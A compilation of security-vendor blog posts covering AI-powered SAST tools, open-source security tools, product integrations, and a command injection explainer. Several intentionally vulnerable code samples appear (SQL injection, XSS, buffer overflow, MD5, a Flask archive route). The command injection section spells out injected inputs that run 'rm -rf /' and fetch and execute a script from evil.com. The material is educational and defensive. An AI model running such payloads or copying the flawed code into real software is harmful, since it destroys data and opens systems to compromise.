Welcome to our blog.

In this article, we break down the 10 leaders in AI SAST tools. We explore the core features of each tool and the unique ways they implement AI to enhance security discovery, prioritization and remediation.

What is SAST?

Static Application Security Testing (SAST) is a methodology for analyzing an application's source code, bytecode, or binary to identify vulnerabilities and security flaws early in the software development lifecycle (SDLC). SAST finds vulnerabilities within the source code, which means that it is often the first defense against insecure code.

For more information SAST vs DAST what you need to know

What vulnerabilities does SAST find in your code?

There are many different vulnerabilities SAST can find and it depends on the coding practices used, technology stack and frameworks. Below are some of the most common vulnerabilities a SAST tool will typically uncover.

SQL Injection

Detects improper sanitization of user inputs that could lead to database compromise.

Example Injection Code

# Function to authenticate user 
def authenticate_user(username, password):     
    query = f"SELECT * FROM users WHERE username = '{user}' AND password = '{password}'"     
    print(f"Executing query: {query}")  # For debugging purposes     
    cursor.execute(query)     
    return cursor.fetchone()

Cross-Site Scripting (XSS)

Identifies instances where user inputs are incorrectly validated or encoded, allowing injection of malicious scripts.

Example of code vulnerable to XSS

<script> 
    const params = new URLSearchParams(window.location.search); 
    const name = params.get('name'); 
    if (name) { 
           // Directly inserting user input into HTML without sanitization 
           document.getElementById('greeting').innerHTML = `Hello, ${name}!`; 
    } 
</script>

Buffer Overflows

Highlights areas where improper handling of memory allocation could lead to data corruption or system crashes.

Example code vulnerable to buffer overflow

#include  
void vulnerableFunction() {     
     char buffer[10]; // A small buffer with space for 10 characters      
     
     printf("Enter some text: ");     
     gets(buffer); // Dangerous function: does not check input size      

     printf("You entered: %s\n", buffer); 
}  

int main() {     
     vulnerableFunction();     
     return 0; 
}

Insecure Cryptographic Practices

Finds weak encryption algorithms, improper key management, or hardcoded keys.

import hashlib  

def store_password(password):     
     # Weak hashing algorithm (MD5 is broken and unsuitable for passwords)     
     hashed_password = hashlib.md5(password.encode()).hexdigest()     
     print(f"Storing hashed password: {hashed_password}")     
     return hashed_password

SAST tools provide valuable insights, enabling developers to fix issues before they become critical.

How AI is Enhancing SAST Tools

Right now you can’t get away from AI buzz (and BullSh*t). It can be difficult to know exactly how AI is being implemented in security tools. We wanted to compare some of the leaders in AI-powered SAST and explain the different ways these tools are implementing AI to enhance security.

Right now there are three trends with AI as it relates to SAST tools.

1. AI to improve vulnerability detection

• AI models trained on large datasets of known vulnerabilities improve the accuracy of identifying security issues while reducing false positives.

2. AI to create automated prioritization

• AI helps rank vulnerabilities based on severity, exploitability, and potential business impact, allowing developers to focus on critical issues first.

3. AI to provide automated remediation

• AI provides context-aware code fixes or suggestions, speeding up the remediation process and helping developers learn secure coding practices.

Top 10 AI-Powered SAST Tools

Here are 10 industry leaders that are using AI in different ways to enhance the capabilities of traditional SAST

(In alphabetical order)

Aikido Security | AI AutoFix

Core AI Capability | Auto Remediation (Dashboard + IDE)

Aikido Security uses AI to create code fixes for vulnerabilities discovered by its SAST scanner and can even generate automated pull requests to speed up the remediation process.
Unlike other tools, Aikido does not send your code to a third-party AI model and has a unique method of ensuring your code does not leak through AI models. Aikido creates a sandbox environment of your code, then a purpose-tuned LLM will scan it, and create suggestions which are also scanned again for vulnerabilities. Once the suggested remediation as passed validation, a pull request can be automatically created before finally the Sandbox environment is destroyed. Aikidos AutoFix is also able to give a confidence score on the suggestions it makes to developers to make informed decisions when using AI-generated code.

Checkmarx

Core AI Capability | Auto Remediation (IDE only)

Chckmarx SAST tools can provide AI-generated coding suggestions to developers within their IDE. The tool connects to ChatGPT transmits the developer's code to the OpenAI model and retrieves the suggestions. This method makes the process of querying ChatGPT easier but does not add any proprietary processes giving it limited capabilities right now.

WARNING - This use-case sends your proprietary code to OpenAI and may not meet compliance standards.

CodeAnt AI

Core AI Capability | Improved Detection (Dashboard)
CodeAnt is a code security and quality tool that entirely uses AI for its discovery of code vulnerabilities and suggested fixes. CodeAnt does not provide documentation on how their AI models work but generally uses AI as their core detection engine, this can slow down detection, particularly in large enterprises.

CodeThreat

Core AI Capability | Automated Prioritization (Dashboard)
CodeThreat offers on-premise static code analysis and provides AI-assisted remediation strategies. A core difference is that CodeThreat allows you to integrate your own on-premise AI model into their tool. This has the advantage of not sending data to a third party but means it can only offer genetically trained AI models right now and you need to be running an on-premise AI LLM like ChatGPT.

Fortify Static Code Analyzer

Core AI Capability | Improved Prioritization (Dashboard)

Fortify Static Code Analyzer scans source code for vulnerabilities and gives users the option to adjust thresholds when an alert is made for example likeliness of exploitability. Fortifies AI Autoassistant reviews the previous thresholds assigned to vulnerabilities and makes intelligent predictions on what the thresholds for other vulnerabilities should be.

Note: Fortify Static Code Analyzer does not use AI to discover vulnerabilities or suggest fixes for them, instead it uses it to predict administrative settings used in the admin panels.

GitHub Advanced Security | CodeQL

Core AI Capability | Auto Remediation (IDE + Dashboard)
GitHub CodeQL is a static code scanner that uses AI to create intelligent auto-remediation in the form of code suggestions. Developers can accept or dismiss the changes via pull requests in GitHub CodeSpaces or from their machine.

Qwiet AI | SAST Code

Core AI Capability | Auto Remediation (Dashboard)
Qwiet AI SAST is a rule-based static application security testing tool that leverages AI to auto-suggest remediation advice and code fixes for code vulnerabilities. Its core offering is its three-stage AI agents which Analyze the issue, Suggest a fix, and then validate the fix.

Snyk Code | DeepCode

Core AI Capability | Auto Remediation (IDE)
Snyk Code, a developer-focused, real-time SAST tool that can provide code suggestions to developers from within the IDE thanks toDeepCode AI which Snyk acquired. DeepCode AI utilizes multiple AI models and the core selling point is that their models are trained on data curated by top security specialists giving improved confidence in the AI results.

SemGrep SAST

Core AI Capability | Improved Detection
SemGreps AI assistant, aptly named assistant, uses the context of the code surrounding a potential vulnerability to provide more accurate results and provide recommended code fixes. It can also be used to create rules for SemGrep to enhance its detection based on the prompts you provide.

Veracode Fix

Core AI Capability | Auto Remediation
Veracode fix uses AI to suggest changes based on vulnerabilities within code when developers are using the Veracode IDE extension or CLI tool. The main differentiator for Veracode Fix is that their custom-trained model is not trained on code in the wild but on known vulnerabilities within their database. The positive of this will be more confidence in suggested fixes, the negative is that it is more limited in the scenarios that it can suggest code fixes.

How to choose a SAST tool

AI) is a relatively new entrant to the security market, and industry leaders are continuously exploring innovative applications. AI should be viewed as a tool to enhance security systems, rather than as a sole source of truth. It's important to note that AI cannot transform subpar tools into effective ones. To maximize its potential, AI should be integrated with tools that already have a robust foundation and a proven track record.

Checkout Aikido SAST today

A robust security strategy is no longer a nice-to-have. It's essential to remain competitive and trustworthy in the market. Security teams are under constant pressure to quickly address vulnerabilities and maintain compliance, all while scaling business operations. In this blogpost, Roeland Delrue and Sonali Samantaray, co-founder of Aikido Security and Sr Solutions Engineer at Sprinto, respectively, share their expertise in scaling security solutions that balance risk, growth, and compliance requirements. As leaders in vulnerability management and compliance automation, they provide actionable insights to help organizations secure their growth path.

1. Stay on Top of Risks

As organizations scale, their risk profile grows. With each new process, customer, or data touchpoint, the security landscape expands, making it more difficult for teams to identify, assess, and prioritize vulnerabilities. Without an integrated, real-time approach, risks can accumulate and the potential for damage - reputational or financial - can multiply. One small misconfiguration or overlooked vulnerability can expose millions of sensitive data points or disrupt operations.

As Roeland notes, "Security isn’t just a safeguard - it's a crucial part of your business’s ability to grow and earn trust. If you’re not managing risk, your customers will notice - and they may decide to go elsewhere. Focusing on the right security efforts helps you build that trust and drive business growth.”

By automating security tools with integrated compliance management, organizations can streamline risk tracking, reduce manual remediation, and ensure real-time compliance - enabling teams to focus on proactive security measures rather than reactive patchwork. Automated tools help teams by providing real-time visibility, reducing alert fatigue, and simplifying compliance, creating a foundation that supports proactive risk management.

2. Prioritize Effective Remediation

Managing a growing list of vulnerabilities and risks can quickly become overwhelming. When faced with dozens or even hundreds of security alerts, teams often fall into a cycle of alert fatigue - where the sheer volume of notifications desensitizes them to the risks at hand. This can lead to analysis paralysis, where decision-making becomes harder and progress slows down because there are too many issues to address at once. According to Roeland, this volume can undermine the effectiveness of remediation efforts.

"When you overwhelm your team with hundreds of issues, the chances of them resolving any of them effectively drops significantly. It’s all about prioritizing the most critical problems, so your team can focus on what truly matters. This focused approach not only reduces alert fatigue but ensures that the issues addressed are the ones that will make the biggest impact," says Roeland.

To avoid this pitfall, it's critical to focus your security efforts on what matters most. Tools that highlight the most pressing issues - not just the most numbers - help teams make meaningful progress. With clear priorities for remediation, organizations can reduce the risk of critical vulnerabilities slipping through the cracks.

Without the right focus, teams end up in a constant reactive state. But a targeted approach - where you can address high-risk issues right away- allows teams to get out of the reactive loop and spend time on proactive security measures.

"Without the right focus," Sonali explains, "teams end up in a constant reactive state. But a targeted approach - where you can address high-risk issues right away- allows teams to get out of the reactive loop and spend time on proactive security measures." By prioritizing alerts, reducing false positives, and deploying specialized security tools, organizations can avoid the whack-a-mole cycle of constantly addressing low-priority issues while missing the big ones. By focusing remediation efforts on high-impact vulnerabilities, security teams can effectively manage risk and focus on other high-value tasks, such as developing new features or refining product offerings.

3. Centralize Your Security Posture

With so many components, it's easy for security data to become siloed across platforms and teams. Siloed data creates blind spots in your security posture, making it difficult for security teams to act quickly and efficiently. This disconnect can lead to compliance failures, security breaches, and delays that prevent your organization from scaling securely.

"Having everything in one place isn't just about convenience," says Roeland. "It's about getting a complete, real-time picture of your risk and compliance landscape. A centralized system makes it easier to connect the dots, identify gaps, and prioritize resources effectively."

Having everything in one place isn't just about convenience. It's about getting a complete, real-time picture of your risk and compliance landscape. A centralized system makes it easier to connect the dots, identify gaps, and prioritize resources effectively.

A centralized security posture brings all of these elements - vulnerability management, compliance tracking, and ongoing risk assessment- into a unified view. This approach enables security teams to see their entire landscape at once, identify and address gaps in real time, and create a cohesive system that's always audit-ready. By combining a vulnerability-focused solution like Aikido with a compliance-focused platform like Sprinto, organizations can streamline their security practices, reduce manual reporting, and ensure that compliance and security work hand in hand rather than in isolation.

The Path Forward

Navigating today's complex security landscape requires an approach that is both proactive and focused. By staying on top of risks, prioritizing effective remediation, and centralizing their security posture, organizations can not only improve their security but also enhance their ability to scale safely and confidently. As Roeland aptly states, "Security is not a one-time project. It's an ongoing commitment to your customers and your growth." Investing in these steps isn't just about keeping up with security standards - it's about enabling business growth while keeping customer trust at the forefront.

Using SprintoGRC + Aikido together means you can get compliance done faster - and cheaper. And who doesn’t love saving time and money?

Learn more about Sprinto here. Set up the Sprinto x Aikido integration here.

Security can be a difficult, expensive world to navigate. So we decided to create a comprehensive guide of open-source security tools to cut through the bullsh*t and show what the most critical tools to implement are, what assets you need to protect, and how you can build a long-term security plan using only free and open-source tools.

Download the guide here

What are the most critical tools?

There are seemingly endless security tools available, the first step is always deciding where to start. While it can always differ depending on specifics, we always recommend starting with the low-hanging fruit for attackers. Make sure your cloud infrastructure is secure, you don’t have secrets attackers can easily find, there are no simple coding mistakes leading to errors and you don’t have critical vulnerabilities in your open-source supply chain. From there you can implement more tools to improve security and behind to implement more best practices throughout the software development lifecycle.

What tools are available?

There are a lot of great open-source tools available and much will depend on your stack and exact needs, but below are some of what we consider to be the gold standard and a great place to start.

CSPM (Cloud Security Posture Management)

Cloudsploit
CSPM is an essential tool for protecting our cloud assets, Cloudsploit is an open-source CSPM. The project detects security risks in cloud infrastructure accounts, including Amazon Web Services (AWS), Microsoft Azure, Google Cloud Platform (GCP) and Oracle Cloud Infrastructure (OCI).

Secrets Detection

Trufflehog | gitleaks.
Secrets are high-value targets for attackers as they allow fast lateral movements into new systems, in fact, secrets are used in 83% of breaches. It is essential to detect them where they live, especially in your git repositories. Two of the best open-source tools for secrets are Trufflehog and gitleaks.

SCA (Software Composition Analysis)

Trivy | Dependency-Check | Dependency-Track
Open-source dependencies make up 85% of the code of our applications, this can mean attackers know your code better than you do! It is critical that we know what open-source components contain vulnerabilities. SCA tools analyze what open-source dependencies we use in our applications and determine what have known vulnerabilities against them. Trivy, Dependency-Check and Dependecy-Track are great tools to help us understand our open-source risks.

SAST (Static Application Security Testing)

Bandit | Breakeman| GoSec |SemGrep
SAST reviews your source code for mistakes that can lead to security issues. Some of the most common errors SAST can uncover are injection vulnerabilities, encryption failures and buffer overflows. The tools you choose will need to be specific to your specific tech stack. Some great options Bandit (Python), Breakeman (Ruby), GoSec (Go) and SemGrep (Generic).

DAST (Dynamic Application Security Testing)

Nuclei | Zap
DAST tools act like an automated hacker that runs attacks against your domains to discover exploitable vulnerabilities, this is also sometimes referred to as surface monitoring. Two great open-source tools are Nuclei and Zap.

Malware Detection

Phylum
Classic SCA tools rely on vulnerabilities that have been publicly disclosed. Malware detection is about discovering malicious code inside packages that may not have been reported. Phylum is a great tool for this, while technically it is not completely open-source but does have a free version which can be used with their CLI scanning tool.

IaC Scanning

Checkov
Infrastructure as code has allowed us to more confidently and easily provision and deploy cloud infrastructure. This can however lead to misconfiguration that introduces security issues. CSPM tools discussed before can find errors in your cloud infrastructure whereas IaC scanning can prevent the errors from happening before deployment. Checkov is a great tool that can scan these for security issues

In-App Firewall

Zen-Node | Zen Python
There has been a real trend about shifting left in security (moving security earlier in the lifecycle), while this is great we shouldn’t neglect the other side of this and implement security for our running applications. Zen by Aikido is an open-source in-app firewall that can block attacks like injection at runtime adding a secondary level of protection. Zen-Node | Zen Python

End-of-life components

endoflife.date
A big risk of our open-source supplychain is components that are no longer being maintained, endoflife.date is a great database of projects that are no longer activity being maintained and shouldn’t be used in production.

License Protection

Trivy
It is important to be aware that you are using the correct open-source license with your application, Trivy provides great insights into open-source license types and how they are being used.

Are open-source tools as good as commercial versions?

Open-source tools can be very high quality in terms of their scanning capabilities. However commercial tools bring more to the table when it comes to noise reduction, remediation, and monitoring. Many commercial tools like Aikido use open-source scanners under the hood. You shouldn't be afraid to use open-source tools but do be aware that using open-source tools, particularly as you grow, will require a lot of engineering time.

Why use open-source security tools

• No barrier to entry (quick and free to get started)
• Open-source is a great tool to get board buy-in (These tools can be used to highlight security issues)
• High-quality scanners (Many open-source tools match capabilities in scanning)
• Community support

Why not use open-source security tools

• Difficult setup, open-source tools use a patchwork of languages and frameworks so getting them talking nicely is difficult.
• Noisy, open-source tools tend to focus on discovery so can bring many false positives if additional layers of filtering are not created.
• Limited support, if tools breaks you are on your own
• No RBAC. In modern development, it's important to have the entire team involved. Open-source security doesn’t allow any filtering between roles making it a heavy burden on the security team.

There is no right answer for open-source over commercial tools and both have their place, read more on this subject here.

The Aikido Difference

If you are investigating open-source security tools you will likely have come or will come to the realization that commercial tools are expensive while open-source tools require lots of work to be able to centralize them in a dashboard. In Aikido we understand that challenge and creating a product seamlessly brings together open-source projects, centralized into a single dashboard bringing context to every security issue with auto-triage and remediation workflows. This enables you to have the power of a large commercial tool at a fraction of the price.

Get Started for Free

Cursor AI has quickly become the hot AI code editor, rapidly gaining popularity with developers looking to write code faster and more efficiently. But while Cursor accelerates coding, how can devs trust that Gen AI code is secure?

TL;DR: with Aikido x Cursor, devs can secure their code as it’s written generated.

If you’ve missed the hype so far, Cursor is an “AI Native” IDE built on VSCode. It operates in an increasingly crowded field of Gen AI coding copilot startups, competing with Github Co-pilot, Cognition, Poolside, Magic, and Augment amongst others.

While Cursor was founded in 2022, but it wasn’t until mid-2024 that Cursor began its meteoric rise to the front of the Gen AI code race, around the same time that Cursor added Sonnet 3.5M as their default model... Below is a snapshot from last week’s ‘The Pragmatic Engineer” by Gregely Orosz, the #1 tech newsletter on substack, covering how developers rank different IDEs with GenAI features:

While respondents are likely mostly early adopters, it is still pretty impressive to see Cursor as a new entrant capturing hearts & minds so quickly. It’s no surprise they’ve since raised $60m in Series A funding from Andreessen Horowitz, Thrive Capital, OpenAI, Jeff Dean, Noam Brown, and the founders of Stripe, GitHub, Ramp, Perplexity, and OpenAI, among others.

That’s why Aikido Security is excited to launch our new integration with Cursor AI. Aikido x Cursor brings real-time security into the Cursor IDE, helping developers write and generate secure code from the start—without breaking stride.

How the Integration Works

Today you can integrate Aikido directly into your Cursor IDE. Aikido will scan your codebase for secrets, API keys and SAST code issues as you develop, whenever you open or save a file.

If any issues are detected, Aikido highlights them in the editor and displays issues in the Problems panel. When you hover over a detected SAST issue, additional tl;dr context about the problem is provided. In some instances, you can even fix issues with Cursor’s suggestions in chat (though its still rusty).

1. Detect Vulnerabilities Instantly
   Aikido scans code as it’s generated, identifying security vulnerabilities in real time. Clear, concise explanations ensure you know what the issue is and why it matters—no overcomplicated reports.
2. Fix Issues with One Click
   When a vulnerability is flagged, Cursor can generate fix suggestions in one click. You can apply it directly from within Cursor’s chat interface. Be aware that not all of Cursor’s suggestions are valid.
3. Stay Focused
   Everything happens within the Cursor IDE. There’s no need to switch tools, run external scans, or juggle separate platforms. Aikido integrates seamlessly into the IDE, so you can focus on building while knowing your code is secure.

Why It Matters

There’s no doubting the impact Gen AI will have on engineering. AI code generators or co-pilots are not infallible. On one hand, Gen AI can be used to increase security (more on this very soon!). On the other hand, they will also inevitably introduce vulnerabilities as well. We are all waiting for the day that AI can finish the nitty gritty. Today we are a step closer.

This integration allows developers to stay in the fast lane and build secure applications while leveraging the best of AI-driven tools while being assured the output is secure. Get security done. Get back to building.

Get Started

The Aikido integration is available now for Cursor users. For now, you will need a paid subscription to integrate. Follow the steps below:

Step 1. Head over to the Visual Studio Code Marketplace and follow the instructions on how to install an extension in Cursor.

Step 2. In Aikido, go to the Cursor IDE integration page and create your token.

Step 3. Check out the examples in our docs on the Visual Studio Marketplace to test whether everything works well.

Step 4. Get back to building.

Secure your code as it's written generated.

If you missed it, over the summer months launched our product on the AWS Marketplace with the promise to deliver the fastest “time-to-security” in the industry for new AWS users.

We’ve also officially joined the AWS Partner Network (APN) as a validated AWS partner.

This means we went through the AWS Foundational Technical Review (FTR). We are FTR-approved* and meet the well-architected best practices enforced by AWS, not to brag. ;)

Psst. You’ll soon be able to use Aikido to achieve FTR approval. We’re mapping Aikido functionality to the FTR security process, so you can get up, running, and co-selling with AWS fast. Interested? → sign up here and you’ll be the first to know when.

Beyond the snazzy partner badge, we’re excited to be an official AWS partner to unlock greater access to the AWS community. We can better serve cloud-native customers, cut-out unnecessary complexity in the customer journey, and expand our own Cloud Security Posture Management (CSPM) product for AWS Cloud users.

Why add Aikido to your AWS bill?

Aikido Security provides comprehensive code-to-cloud coverage, aligning well with AWS’s full-stack capabilities. This is especially valuable for AWS customers managing both application and cloud security on a unified platform.

The direct integration with AWS environments simplifies deployment, enabling Aikido to scan for vulnerabilities across AWS services like EC2, S3, Lambda, and more – enhancing security visibility within AWS and complementing cloud-native architecture. Aikido's AWS posture management is built on AWS Inspector. We can show you findings that can cause hackers to gain initial access to your cloud.

Further, Aikido’s built-in compliance checks align with major standards (SOC2, ISO 27001, NIS 2, HIPAA), making it easier for AWS clients to maintain compliance across AWS’s infrastructure, which is especially valuable for regulated industries.

Interested to check it out? Come find us on the AWS marketplace

What is Command Injection?

Command injection is a vulnerability still very prevalent in web applications despite being less famous than its cousins SQL injection or Code injection. If you’re familiar with other injection vulnerabilities, you’ll recognize the common principle: untrusted user input is not properly validated, leading to the execution of arbitrary system commands. This flaw occurs when unvalidated input is passed to system-level functions. So how prominent is command injection actually? We looked at how common it is to see this vulnerability in the wild, *spoiler*, it is surprisingly common!

Example of Command Injection

Consider this example of command injection, let’s say you have an application where you can enter the name of a file hosted on a server. The application retrieves that file writing out its content. The code for which is below

import os

file_name = input("Enter the file name: ")
os.system(f"cat {file_name}")

The above code expects a user to insert a file name like file.txt , but instead a malicious user injects some code to run malicious commands.

For example
Name of file: file.txt; rm -rf /

This input would first display the contents of file.txt and then execute the malicious rm -rf command, which will forcibly delete all the files in a directory.

The malicious user can do this because the application did not validate or sanitize the user's input making the application susceptible to command injection.

If you would like a more comprehensive example see the bonus content at the bottom of this page.

Command Injection in Numbers: Our Research

• 7% of all vulnerabilities found in open-source projects in 2024 were command injection
• 5.8% for closed-source projects!
• An increase in the total number of command injection vulnerabilities in open-source projects from 2,348 (2023) to an expected 2,600 (2024).
• As a percentage of all vulnerabilities, Command injection is getting less popular: a decrease of 14.6% and 26.4% for open-source and closed-source projects respectively from 2023 to 2024

Our research focused on researching both open-source and closed-source projects to reveal how many had command injection vulnerabilities hiding within.

Overall the number of command injection vulnerabilities is very high with 7% of allvulnerabilities reported in open-source projects being command injection and 5.8% in closed-source projects. This is quite close to the number of SQL injection vulnerabilities found.

There is some good news to pull out of the data too, we are seeing a solid trend of these vulnerabilities reducing from 2023 to 2024. As a percentage of all vuleribilities we saw a reduction of 27% in closed-source projects and 14% in open-source. There are likely many factors contributing to this, one likely significant factor is that the FBI and CISA in 2024 pointed to command injection as a real threat and urged vendors to pay attention to it. According to the data, this warning was heard.

The good news unfortunately stops there. We are still seeing an increase in the overall number of vulnerabilities reported in open-source projects. The total number of injection vulnerabilities reported in open-source projects went from 2,348 in 2023 to 2,450 so far in 2024 (expected to reach 2,600)

How to Prevent Command Injection

Preventing command injection vulnerabilities requires a multi-faceted approach:

Server-side Input Validation

A common mistake some make is performing only clientside validation which can be bypassed by an attacker making a direct request.

import subprocess

# Example of restricted input
allowed_files = ['file1.txt', 'file2.txt']
user_input = "file1.txt"  # This should come from user, but is validated

if user_input in allowed_files:
    subprocess.Popen(['ls', '-l', user_input])
else:
    print("Invalid input!")

Avoid shell commands

Replace shell commands with language-native functions or libraries where possible. Below is an example of using read only mode to open a file and read the contexts within.

with open("file.txt", "r") as f:
print(f.read())

Automated Testing

Use tools like Aikido to scan your source code and application to discover these vulnerabilities.

Use an in-app firewall

One of the best defenses against injection attacks is an in-app firewall that is able to catch and block malicious commands. Aikido’s in-app firewall Zen is available in open-source and commercial is able to detect and block injection attacks at run time.

Apply the Principle of Least Privilege

Configure applications and users to run with the minimum privileges necessary, reducing potential damage from exploitation.

The road forward

Command injection along with many injection vulnerabilities is a challenge, from a technology point of view, we have solved this, meaning there is no need to have this kind of vulnerability in your applications. With that in mind, the fact that we still see so many of these types of vulnerabilities means we can’t expect a quantum leap of improvement.

Command injection will continue to be a problem however because we did see a significant drop this year with large organizations putting a focus on this vulnerability, there is hope to think that command injection may become less prominent in the future if we continue to bring awareness to it.

Bonus Content

A History of Command Injection: Prominent Breaches

Command injection has been a persistent threat for a long time. In fact, there was a significant command injection vulnerability that was present in bash from 1989 all the way to 2014. More recently in 2024, the importance of command injection was highlighted by the CISA and FBI showing it is still a big concern.

1. Early Days of Command Injection

• First Known Usage: Command injection vulnerabilities emerged with the rise of multi-user computing systems in the 1970s and 1980s, allowing attackers to execute arbitrary commands via unsanitized inputs.
• 1980s and 1990s: The proliferation of web technologies led to increased exploitation of command injection, particularly through improperly secured CGI scripts.

2. Significant Breaches and Exploits

• 1998: The First Documented Web-based Command Injection Attack: A vulnerability in a widely used Perl-based CGI script was exploited, marking one of the first major web-based command injection incidents.
• 2010: Stuxnet Worm (Embedded Command Injection): Stuxnet utilized command injection to target industrial control systems, demonstrating the vulnerability's reach beyond traditional IT environments.

3. 2010s: Exploitation at Scale

• 2014: Shellshock Vulnerability: Shellshock (CVE-2014-6271) exploited Bash's command processing, affecting millions of systems worldwide.
• 2018: Cisco ASA VPN Exploit (CVE-2018-0101): A command injection vulnerability in Cisco's ASA software allowed remote code execution, compromising enterprise security.

4. 2020s: Modern Exploits and Trends

• 2020: Citrix ADC Gateway Exploit: Attackers exploited command injection vulnerabilities in Citrix systems, leading to significant data breaches.
• 2023: MOVEit Vulnerability (SQL and Command Injection): A command injection flaw in MOVEit Transfer software led to widespread data breaches across multiple organizations.

Realistic command injection vulnerability

The Vulnerable Code

Let's look at a slightly more complex example of command injection. Below is some code for a simple Python web application. It allows users to create a ZIP archive of specified files by sending a POST request to the /archive route.

from flask import Flask, request
import os

app = Flask(__name__)

@app.route('/archive', methods=['POST'])
def archive_files():
    files = request.form.get('files')  # User provides file names to archive
    archive_name = request.form.get('archive_name')  # User provides archive name
    
    command = f"zip {archive_name}.zip {files}"  # Command built dynamically
    os.system(command)  # Execute the system command

    return f"Archive {archive_name}.zip created successfully!"
if __name__ == "__main__":
    app.run(debug=True)

How It Works

The user supplies:

• files (e.g., file1.txt file2.txt) to specify which files to include in the archive.
• archive_name to specify the name of the resulting zip archive.

The code constructs a shell command dynamically:

1. zip archive_name.zip file1.txt file2.txt

2. The os.system() function executes the command, allowing the user-provided inputs to dictate its behavior.

Exploitation

An attacker exploits this by injecting additional commands into the archive_name or files inputs.

Input Provided by the Attacker:

• archive_name: my_archive; rm -rf /
• files: file1.txt

The Resulting Command:

zip my_archive.zip file1.txt; rm -rf /

1. zip my_archive.zip file1.txt: Creates an archive as expected.
2. ; rm -rf /: Deletes all files on the server by executing a separate destructive command.

A More Sophisticated Example

The attacker might exploit this to download malware or exfiltrate data:

archive_name: archive; curl -o malware.sh http://evil.com/malware.sh; bash malware.sh

Resulting Command:

zip archive.zip file1.txt; curl -o malware.sh http://evil.com/malware.sh; bash malware.sh

This command:

1. Creates an archive (zip archive.zip file1.txt).
2. Downloads malicious code (curl -o malware.sh http://evil.com/malware.sh).
3. Executes the malware (bash malware.sh).